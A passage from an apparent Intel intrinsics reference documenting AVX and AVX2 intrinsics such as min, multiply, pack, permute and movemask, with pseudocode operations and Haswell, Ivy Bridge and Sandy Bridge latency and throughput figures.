FOR j := 0 to 7 i := j*32 IF a[i+31:i] < b[i+31:i] dst[i+31:i] := a[i+31:i] ELSE dst[i+31:i] := b[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpminub
__m256i _mm256_min_epu8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_min_epu8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpminub ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed unsigned 8-bit integers in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 31 i := j*8 IF a[i+7:i] < b[i+7:i] dst[i+7:i] := a[i+7:i] ELSE dst[i+7:i] := b[i+7:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vminpd
__m256d _mm256_min_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_min_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vminpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Compare packed double-precision (64-bit) floating-point elements in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := MIN(a[i+63:i], b[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vminps
__m256 _mm256_min_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_min_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vminps ymm, ymm, ymm
CPUID Flags: AVX

Description

Compare packed single-precision (32-bit) floating-point elements in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := MIN(a[i+31:i], b[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vmovddup
__m256d _mm256_movedup_pd (__m256d a)

Synopsis

__m256d _mm256_movedup_pd (__m256d a)
#include «immintrin.h»
Instruction: vmovddup ymm, ymm
CPUID Flags: AVX

Description

Duplicate even-indexed double-precision (64-bit) floating-point elements from a, and store the results in dst.

Operation

dst[63:0] := a[63:0] dst[127:64] := a[63:0] dst[191:128] := a[191:128] dst[255:192] := a[191:128] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vmovshdup
__m256 _mm256_movehdup_ps (__m256 a)

Synopsis

__m256 _mm256_movehdup_ps (__m256 a)
#include «immintrin.h»
Instruction: vmovshdup ymm, ymm
CPUID Flags: AVX

Description

Duplicate odd-indexed single-precision (32-bit) floating-point elements from a, and store the results in dst.

Operation

dst[31:0] := a[63:32] dst[63:32] := a[63:32] dst[95:64] := a[127:96] dst[127:96] := a[127:96] dst[159:128] := a[191:160] dst[191:160] := a[191:160] dst[223:192] := a[255:224] dst[255:224] := a[255:224] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vmovsldup
__m256 _mm256_moveldup_ps (__m256 a)

Synopsis

__m256 _mm256_moveldup_ps (__m256 a)
#include «immintrin.h»
Instruction: vmovsldup ymm, ymm
CPUID Flags: AVX

Description

Duplicate even-indexed single-precision (32-bit) floating-point elements from a, and store the results in dst.

Operation

dst[31:0] := a[31:0] dst[63:32] := a[31:0] dst[95:64] := a[95:64] dst[127:96] := a[95:64] dst[159:128] := a[159:128] dst[191:160] := a[159:128] dst[223:192] := a[223:192] dst[255:224] := a[223:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpmovmskb
int _mm256_movemask_epi8 (__m256i a)

Synopsis

int _mm256_movemask_epi8 (__m256i a)
#include «immintrin.h»
Instruction: vpmovmskb r32, ymm
CPUID Flags: AVX2

Description

Create mask from the most significant bit of each 8-bit element in a, and store the result in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[j] := a[i+7] ENDFOR

Performance

Architecture Latency Throughput
Haswell 3
vmovmskpd
int _mm256_movemask_pd (__m256d a)

Synopsis

int _mm256_movemask_pd (__m256d a)
#include «immintrin.h»
Instruction: vmovmskpd r32, ymm
CPUID Flags: AVX

Description

Set each bit of mask dst based on the most significant bit of the corresponding packed double-precision (64-bit) floating-point element in a.

Operation

FOR j := 0 to 3 i := j*64 IF a[i+63] dst[j] := 1 ELSE dst[j] := 0 FI ENDFOR dst[MAX:4] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 2
Sandy Bridge 2
vmovmskps
int _mm256_movemask_ps (__m256 a)

Synopsis

int _mm256_movemask_ps (__m256 a)
#include «immintrin.h»
Instruction: vmovmskps r32, ymm
CPUID Flags: AVX

Description

Set each bit of mask dst based on the most significant bit of the corresponding packed single-precision (32-bit) floating-point element in a.

Operation

FOR j := 0 to 7 i := j*32 IF a[i+31] dst[j] := 1 ELSE dst[j] := 0 FI ENDFOR dst[MAX:8] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 2
Sandy Bridge 2
vmpsadbw
__m256i _mm256_mpsadbw_epu8 (__m256i a, __m256i b, const int imm8)

Synopsis

__m256i _mm256_mpsadbw_epu8 (__m256i a, __m256i b, const int imm8)
#include «immintrin.h»
Instruction: vmpsadbw ymm, ymm, ymm, imm
CPUID Flags: AVX2

Description

Compute the sum of absolute differences (SADs) of quadruplets of unsigned 8-bit integers in a compared to those in b, and store the 16-bit results in dst. Eight SADs are performed for each 128-bit lane using one quadruplet from b and eight quadruplets from a. One quadruplet is selected from bstarting at on the offset specified in imm8. Eight quadruplets are formed from sequential 8-bit integers selected from a starting at the offset specified in imm8.

Operation

MPSADBW(a[127:0], b[127:0], imm8[2:0]) { a_offset := imm8[2]*32 b_offset := imm8[1:0]*32 FOR j := 0 to 7 i := j*8 k := a_offset+i l := b_offset tmp[i+15:i] := ABS(a[k+7:k] — b[l+7:l]) + ABS(a[k+15:k+8] — b[l+15:l+8]) + ABS(a[k+23:k+16] — b[l+23:l+16]) + ABS(a[k+31:k+24] — b[l+31:l+24]) ENDFOR RETURN tmp[127:0] } dst[127:0] := MPSADBW(a[127:0], b[127:0], imm8[2:0]) dst[255:128] := MPSADBW(a[255:128], b[255:128], imm8[5:3]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 7 2
vpmuldq
__m256i _mm256_mul_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_mul_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmuldq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply the low 32-bit integers from each packed 64-bit element in a and b, and store the signed 64-bit results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+31:i] * b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
vpmuludq
__m256i _mm256_mul_epu32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_mul_epu32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmuludq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply the low unsigned 32-bit integers from each packed 64-bit element in a and b, and store the unsigned 64-bit results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+31:i] * b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
vmulpd
__m256d _mm256_mul_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_mul_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vmulpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Multiply packed double-precision (64-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+63:i] * b[i+63:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 0.5
Ivy Bridge 5 1
Sandy Bridge 5 1
vmulps
__m256 _mm256_mul_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_mul_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vmulps ymm, ymm, ymm
CPUID Flags: AVX

Description

Multiply packed single-precision (32-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[i+31:i] * b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 0.5
Ivy Bridge 5 1
Sandy Bridge 5 1
vpmulhw
__m256i _mm256_mulhi_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_mulhi_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmulhw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply the packed 16-bit integers in a and b, producing intermediate 32-bit integers, and store the high 16 bits of the intermediate integers in dst.

Operation

FOR j := 0 to 15 i := j*16 tmp[31:0] := a[i+15:i] * b[i+15:i] dst[i+15:i] := tmp[31:16] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
vpmulhuw
__m256i _mm256_mulhi_epu16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_mulhi_epu16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmulhuw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply the packed unsigned 16-bit integers in a and b, producing intermediate 32-bit integers, and store the high 16 bits of the intermediate integers in dst.

Operation

FOR j := 0 to 15 i := j*16 tmp[31:0] := a[i+15:i] * b[i+15:i] dst[i+15:i] := tmp[31:16] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5
vpmulhrsw
__m256i _mm256_mulhrs_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_mulhrs_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmulhrsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply packed 16-bit integers in a and b, producing intermediate signed 32-bit integers. Truncate each intermediate integer to the 18 most significant bits, round by adding 1, and store bits [16:1] to dst.

Operation

FOR j := 0 to 15 i := j*16 tmp[31:0] := ((a[i+15:i] * b[i+15:i]) >> 14) + 1 dst[i+15:i] := tmp[16:1] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
vpmullw
__m256i _mm256_mullo_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_mullo_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmullw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply the packed 16-bit integers in a and b, producing intermediate 32-bit integers, and store the low 16 bits of the intermediate integers in dst.

Operation

FOR j := 0 to 15 i := j*16 tmp[31:0] := a[i+15:i] * b[i+15:i] dst[i+15:i] := tmp[15:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
vpmulld
__m256i _mm256_mullo_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_mullo_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmulld ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply the packed 32-bit integers in a and b, producing intermediate 64-bit integers, and store the low 32 bits of the intermediate integers in dst.

Operation

FOR j := 0 to 7 i := j*32 tmp[63:0] := a[i+31:i] * b[i+31:i] dst[i+31:i] := tmp[31:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 10 1
vorpd
__m256d _mm256_or_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_or_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vorpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise OR of packed double-precision (64-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+63:i] BITWISE OR b[i+63:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vorps
__m256 _mm256_or_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_or_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vorps ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise OR of packed single-precision (32-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[i+31:i] BITWISE OR b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpor
__m256i _mm256_or_si256 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_or_si256 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpor ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compute the bitwise OR of 256 bits (representing integer data) in a and b, and store the result in dst.

Operation

dst[255:0] := (a[255:0] OR b[255:0]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.33
vpacksswb
__m256i _mm256_packs_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_packs_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpacksswb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Convert packed 16-bit integers from a and b to packed 8-bit integers using signed saturation, and store the results in dst.

Operation

dst[7:0] := Saturate_Int16_To_Int8 (a[15:0]) dst[15:8] := Saturate_Int16_To_Int8 (a[31:16]) dst[23:16] := Saturate_Int16_To_Int8 (a[47:32]) dst[31:24] := Saturate_Int16_To_Int8 (a[63:48]) dst[39:32] := Saturate_Int16_To_Int8 (a[79:64]) dst[47:40] := Saturate_Int16_To_Int8 (a[95:80]) dst[55:48] := Saturate_Int16_To_Int8 (a[111:96]) dst[63:56] := Saturate_Int16_To_Int8 (a[127:112]) dst[71:64] := Saturate_Int16_To_Int8 (b[15:0]) dst[79:72] := Saturate_Int16_To_Int8 (b[31:16]) dst[87:80] := Saturate_Int16_To_Int8 (b[47:32]) dst[95:88] := Saturate_Int16_To_Int8 (b[63:48]) dst[103:96] := Saturate_Int16_To_Int8 (b[79:64]) dst[111:104] := Saturate_Int16_To_Int8 (b[95:80]) dst[119:112] := Saturate_Int16_To_Int8 (b[111:96]) dst[127:120] := Saturate_Int16_To_Int8 (b[127:112]) dst[135:128] := Saturate_Int16_To_Int8 (a[143:128]) dst[143:136] := Saturate_Int16_To_Int8 (a[159:144]) dst[151:144] := Saturate_Int16_To_Int8 (a[175:160]) dst[159:152] := Saturate_Int16_To_Int8 (a[191:176]) dst[167:160] := Saturate_Int16_To_Int8 (a[207:192]) dst[175:168] := Saturate_Int16_To_Int8 (a[223:208]) dst[183:176] := Saturate_Int16_To_Int8 (a[239:224]) dst[191:184] := Saturate_Int16_To_Int8 (a[255:240]) dst[199:192] := Saturate_Int16_To_Int8 (b[143:128]) dst[207:200] := Saturate_Int16_To_Int8 (b[159:144]) dst[215:208] := Saturate_Int16_To_Int8 (b[175:160]) dst[223:216] := Saturate_Int16_To_Int8 (b[191:176]) dst[231:224] := Saturate_Int16_To_Int8 (b[207:192]) dst[239:232] := Saturate_Int16_To_Int8 (b[223:208]) dst[247:240] := Saturate_Int16_To_Int8 (b[239:224]) dst[255:248] := Saturate_Int16_To_Int8 (b[255:240]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpackssdw
__m256i _mm256_packs_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_packs_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpackssdw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Convert packed 32-bit integers from a and b to packed 16-bit integers using signed saturation, and store the results in dst.

Operation

dst[15:0] := Saturate_Int32_To_Int16 (a[31:0]) dst[31:16] := Saturate_Int32_To_Int16 (a[63:32]) dst[47:32] := Saturate_Int32_To_Int16 (a[95:64]) dst[63:48] := Saturate_Int32_To_Int16 (a[127:96]) dst[79:64] := Saturate_Int32_To_Int16 (b[31:0]) dst[95:80] := Saturate_Int32_To_Int16 (b[63:32]) dst[111:96] := Saturate_Int32_To_Int16 (b[95:64]) dst[127:112] := Saturate_Int32_To_Int16 (b[127:96]) dst[143:128] := Saturate_Int32_To_Int16 (a[159:128]) dst[159:144] := Saturate_Int32_To_Int16 (a[191:160]) dst[175:160] := Saturate_Int32_To_Int16 (a[223:192]) dst[191:176] := Saturate_Int32_To_Int16 (a[255:224]) dst[207:192] := Saturate_Int32_To_Int16 (b[159:128]) dst[223:208] := Saturate_Int32_To_Int16 (b[191:160]) dst[239:224] := Saturate_Int32_To_Int16 (b[223:192]) dst[255:240] := Saturate_Int32_To_Int16 (b[255:224]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpackuswb
__m256i _mm256_packus_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_packus_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpackuswb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Convert packed 16-bit integers from a and b to packed 8-bit integers using unsigned saturation, and store the results in dst.

Operation

dst[7:0] := Saturate_Int16_To_UnsignedInt8 (a[15:0]) dst[15:8] := Saturate_Int16_To_UnsignedInt8 (a[31:16]) dst[23:16] := Saturate_Int16_To_UnsignedInt8 (a[47:32]) dst[31:24] := Saturate_Int16_To_UnsignedInt8 (a[63:48]) dst[39:32] := Saturate_Int16_To_UnsignedInt8 (a[79:64]) dst[47:40] := Saturate_Int16_To_UnsignedInt8 (a[95:80]) dst[55:48] := Saturate_Int16_To_UnsignedInt8 (a[111:96]) dst[63:56] := Saturate_Int16_To_UnsignedInt8 (a[127:112]) dst[71:64] := Saturate_Int16_To_UnsignedInt8 (b[15:0]) dst[79:72] := Saturate_Int16_To_UnsignedInt8 (b[31:16]) dst[87:80] := Saturate_Int16_To_UnsignedInt8 (b[47:32]) dst[95:88] := Saturate_Int16_To_UnsignedInt8 (b[63:48]) dst[103:96] := Saturate_Int16_To_UnsignedInt8 (b[79:64]) dst[111:104] := Saturate_Int16_To_UnsignedInt8 (b[95:80]) dst[119:112] := Saturate_Int16_To_UnsignedInt8 (b[111:96]) dst[127:120] := Saturate_Int16_To_UnsignedInt8 (b[127:112]) dst[135:128] := Saturate_Int16_To_UnsignedInt8 (a[143:128]) dst[143:136] := Saturate_Int16_To_UnsignedInt8 (a[159:144]) dst[151:144] := Saturate_Int16_To_UnsignedInt8 (a[175:160]) dst[159:152] := Saturate_Int16_To_UnsignedInt8 (a[191:176]) dst[167:160] := Saturate_Int16_To_UnsignedInt8 (a[207:192]) dst[175:168] := Saturate_Int16_To_UnsignedInt8 (a[223:208]) dst[183:176] := Saturate_Int16_To_UnsignedInt8 (a[239:224]) dst[191:184] := Saturate_Int16_To_UnsignedInt8 (a[255:240]) dst[199:192] := Saturate_Int16_To_UnsignedInt8 (b[143:128]) dst[207:200] := Saturate_Int16_To_UnsignedInt8 (b[159:144]) dst[215:208] := Saturate_Int16_To_UnsignedInt8 (b[175:160]) dst[223:216] := Saturate_Int16_To_UnsignedInt8 (b[191:176]) dst[231:224] := Saturate_Int16_To_UnsignedInt8 (b[207:192]) dst[239:232] := Saturate_Int16_To_UnsignedInt8 (b[223:208]) dst[247:240] := Saturate_Int16_To_UnsignedInt8 (b[239:224]) dst[255:248] := Saturate_Int16_To_UnsignedInt8 (b[255:240]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpackusdw
__m256i _mm256_packus_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_packus_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpackusdw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Convert packed 32-bit integers from a and b to packed 16-bit integers using unsigned saturation, and store the results in dst.

Operation

dst[15:0] := Saturate_Int32_To_UnsignedInt16 (a[31:0]) dst[31:16] := Saturate_Int32_To_UnsignedInt16 (a[63:32]) dst[47:32] := Saturate_Int32_To_UnsignedInt16 (a[95:64]) dst[63:48] := Saturate_Int32_To_UnsignedInt16 (a[127:96]) dst[79:64] := Saturate_Int32_To_UnsignedInt16 (b[31:0]) dst[95:80] := Saturate_Int32_To_UnsignedInt16 (b[63:32]) dst[111:96] := Saturate_Int32_To_UnsignedInt16 (b[95:64]) dst[127:112] := Saturate_Int32_To_UnsignedInt16 (b[127:96]) dst[143:128] := Saturate_Int32_To_UnsignedInt16 (a[159:128]) dst[159:144] := Saturate_Int32_To_UnsignedInt16 (a[191:160]) dst[175:160] := Saturate_Int32_To_UnsignedInt16 (a[223:192]) dst[191:176] := Saturate_Int32_To_UnsignedInt16 (a[255:224]) dst[207:192] := Saturate_Int32_To_UnsignedInt16 (b[159:128]) dst[223:208] := Saturate_Int32_To_UnsignedInt16 (b[191:160]) dst[239:224] := Saturate_Int32_To_UnsignedInt16 (b[223:192]) dst[255:240] := Saturate_Int32_To_UnsignedInt16 (b[255:224]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpermilpd
__m128d _mm_permute_pd (__m128d a, int imm8)

Synopsis

__m128d _mm_permute_pd (__m128d a, int imm8)
#include «immintrin.h»
Instruction: vpermilpd xmm, xmm, imm
CPUID Flags: AVX

Description

Shuffle double-precision (64-bit) floating-point elements in a using the control in imm8, and store the results in dst.

Operation

IF (imm8[0] == 0) dst[63:0] := a[63:0] IF (imm8[0] == 1) dst[63:0] := a[127:64] IF (imm8[1] == 0) dst[127:64] := a[63:0] IF (imm8[1] == 1) dst[127:64] := a[127:64] dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
Ivy Bridge 1
Sandy Bridge 1
vpermilpd
__m256d _mm256_permute_pd (__m256d a, int imm8)

Synopsis

__m256d _mm256_permute_pd (__m256d a, int imm8)
#include «immintrin.h»
Instruction: vpermilpd ymm, ymm, imm
CPUID Flags: AVX

Description

Shuffle double-precision (64-bit) floating-point elements in a within 128-bit lanes using the control in imm8, and store the results in dst.

Operation

IF (imm8[0] == 0) dst[63:0] := a[63:0] IF (imm8[0] == 1) dst[63:0] := a[127:64] IF (imm8[1] == 0) dst[127:64] := a[63:0] IF (imm8[1] == 1) dst[127:64] := a[127:64] IF (imm8[2] == 0) dst[191:128] := a[191:128] IF (imm8[2] == 1) dst[191:128] := a[255:192] IF (imm8[3] == 0) dst[255:192] := a[191:128] IF (imm8[3] == 1) dst[255:192] := a[255:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
Ivy Bridge 1
Sandy Bridge 1
vpermilps
__m128 _mm_permute_ps (__m128 a, int imm8)

Synopsis

__m128 _mm_permute_ps (__m128 a, int imm8)
#include «immintrin.h»
Instruction: vpermilps xmm, xmm, imm
CPUID Flags: AVX

Description

Shuffle single-precision (32-bit) floating-point elements in a using the control in imm8, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[31:0] := src[31:0] 1: tmp[31:0] := src[63:32] 2: tmp[31:0] := src[95:64] 3: tmp[31:0] := src[127:96] ESAC RETURN tmp[31:0] } dst[31:0] := SELECT4(a[127:0], imm8[1:0]) dst[63:32] := SELECT4(a[127:0], imm8[3:2]) dst[95:64] := SELECT4(a[127:0], imm8[5:4]) dst[127:96] := SELECT4(a[127:0], imm8[7:6]) dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
Ivy Bridge 1
Sandy Bridge 1
vpermilps
__m256 _mm256_permute_ps (__m256 a, int imm8)

Synopsis

__m256 _mm256_permute_ps (__m256 a, int imm8)
#include «immintrin.h»
Instruction: vpermilps ymm, ymm, imm
CPUID Flags: AVX

Description

Shuffle single-precision (32-bit) floating-point elements in a within 128-bit lanes using the control in imm8, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[31:0] := src[31:0] 1: tmp[31:0] := src[63:32] 2: tmp[31:0] := src[95:64] 3: tmp[31:0] := src[127:96] ESAC RETURN tmp[31:0] } dst[31:0] := SELECT4(a[127:0], imm8[1:0]) dst[63:32] := SELECT4(a[127:0], imm8[3:2]) dst[95:64] := SELECT4(a[127:0], imm8[5:4]) dst[127:96] := SELECT4(a[127:0], imm8[7:6]) dst[159:128] := SELECT4(a[255:128], imm8[1:0]) dst[191:160] := SELECT4(a[255:128], imm8[3:2]) dst[223:192] := SELECT4(a[255:128], imm8[5:4]) dst[255:224] := SELECT4(a[255:128], imm8[7:6]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
Ivy Bridge 1
Sandy Bridge 1
vperm2f128
__m256d _mm256_permute2f128_pd (__m256d a, __m256d b, int imm8)

Synopsis

__m256d _mm256_permute2f128_pd (__m256d a, __m256d b, int imm8)
#include «immintrin.h»
Instruction: vperm2f128 ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Shuffle 128-bits (composed of 2 packed double-precision (64-bit) floating-point elements) selected by imm8 from a and b, and store the results in dst.

Operation

SELECT4(src1, src2, control){ CASE(control[1:0]) 0: tmp[127:0] := src1[127:0] 1: tmp[127:0] := src1[255:128] 2: tmp[127:0] := src2[127:0] 3: tmp[127:0] := src2[255:128] ESAC IF control[3] tmp[127:0] := 0 FI RETURN tmp[127:0] } dst[127:0] := SELECT4(a[255:0], b[255:0], imm8[3:0]) dst[255:128] := SELECT4(a[255:0], b[255:0], imm8[7:4]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vperm2f128
__m256 _mm256_permute2f128_ps (__m256 a, __m256 b, int imm8)

Synopsis

__m256 _mm256_permute2f128_ps (__m256 a, __m256 b, int imm8)
#include «immintrin.h»
Instruction: vperm2f128 ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Shuffle 128-bits (composed of 4 packed single-precision (32-bit) floating-point elements) selected by imm8 from a and b, and store the results in dst.

Operation

SELECT4(src1, src2, control){ CASE(control[1:0]) 0: tmp[127:0] := src1[127:0] 1: tmp[127:0] := src1[255:128] 2: tmp[127:0] := src2[127:0] 3: tmp[127:0] := src2[255:128] ESAC IF control[3] tmp[127:0] := 0 FI RETURN tmp[127:0] } dst[127:0] := SELECT4(a[255:0], b[255:0], imm8[3:0]) dst[255:128] := SELECT4(a[255:0], b[255:0], imm8[7:4]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vperm2f128
__m256i _mm256_permute2f128_si256 (__m256i a, __m256i b, int imm8)

Synopsis

__m256i _mm256_permute2f128_si256 (__m256i a, __m256i b, int imm8)
#include «immintrin.h»
Instruction: vperm2f128 ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Shuffle 128-bits (composed of integer data) selected by imm8 from a and b, and store the results in dst.

Operation

SELECT4(src1, src2, control){ CASE(control[1:0]) 0: tmp[127:0] := src1[127:0] 1: tmp[127:0] := src1[255:128] 2: tmp[127:0] := src2[127:0] 3: tmp[127:0] := src2[255:128] ESAC IF control[3] tmp[127:0] := 0 FI RETURN tmp[127:0] } dst[127:0] := SELECT4(a[255:0], b[255:0], imm8[3:0]) dst[255:128] := SELECT4(a[255:0], b[255:0], imm8[7:4]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vperm2i128
__m256i _mm256_permute2x128_si256 (__m256i a, __m256i b, const int imm8)

Synopsis

__m256i _mm256_permute2x128_si256 (__m256i a, __m256i b, const int imm8)
#include «immintrin.h»
Instruction: vperm2i128 ymm, ymm, ymm, imm
CPUID Flags: AVX2

Description

Shuffle 128-bits (composed of integer data) selected by imm8 from a and b, and store the results in dst.

Operation

SELECT4(src1, src2, control){ CASE(control[1:0]) 0: tmp[127:0] := src1[127:0] 1: tmp[127:0] := src1[255:128] 2: tmp[127:0] := src2[127:0] 3: tmp[127:0] := src2[255:128] ESAC IF control[3] tmp[127:0] := 0 FI RETURN tmp[127:0] } dst[127:0] := SELECT4(a[255:0], b[255:0], imm8[3:0]) dst[255:128] := SELECT4(a[255:0], b[255:0], imm8[7:4]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpermq
__m256i _mm256_permute4x64_epi64 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_permute4x64_epi64 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpermq ymm, ymm, imm
CPUID Flags: AVX2

Description

Shuffle 64-bit integers in a across lanes using the control in imm8, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[63:0] := src[63:0] 1: tmp[63:0] := src[127:64] 2: tmp[63:0] := src[191:128] 3: tmp[63:0] := src[255:192] ESAC RETURN tmp[63:0] } dst[63:0] := SELECT4(a[255:0], imm8[1:0]) dst[127:64] := SELECT4(a[255:0], imm8[3:2]) dst[191:128] := SELECT4(a[255:0], imm8[5:4]) dst[255:192] := SELECT4(a[255:0], imm8[7:6]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpermpd
__m256d _mm256_permute4x64_pd (__m256d a, const int imm8)

Synopsis

__m256d _mm256_permute4x64_pd (__m256d a, const int imm8)
#include «immintrin.h»
Instruction: vpermpd ymm, ymm, imm
CPUID Flags: AVX2

Description

Shuffle double-precision (64-bit) floating-point elements in a across lanes using the control in imm8, and store the results in dst.

Operation

